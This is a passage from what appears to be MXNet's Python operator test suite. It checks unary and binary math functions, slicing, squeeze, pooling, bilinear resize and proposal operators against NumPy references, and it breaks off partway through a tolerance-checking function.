'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
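        # Forward must match NumPy slicing; backward must scatter the output
        # gradient back into the sliced region only.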
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
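        # NumPy reference for bilinear resizing with align_corners semantics
        # (scales computed from the (size - 1) ratios).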
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
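        # NumPy reference for the backward pass: scatter each incoming gradient
        # to the four input pixels with the same bilinear weights used forward.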
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
data_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, data_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, data_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, data_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
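# get_sub slices out image i while keeping a leading batch axis of size 1, so the
# per-image Proposal op can be run one image at a time and compared with the batched
# MultiProposal output below.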
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
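# Analytic gradient of f with respect to x is 2*a*x + b; backward_expected below encodes this.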
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
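# getRandom jitters `base` by up to +/- `percent` percent, so each run exercises
# slightly different rtol/atol values.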
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
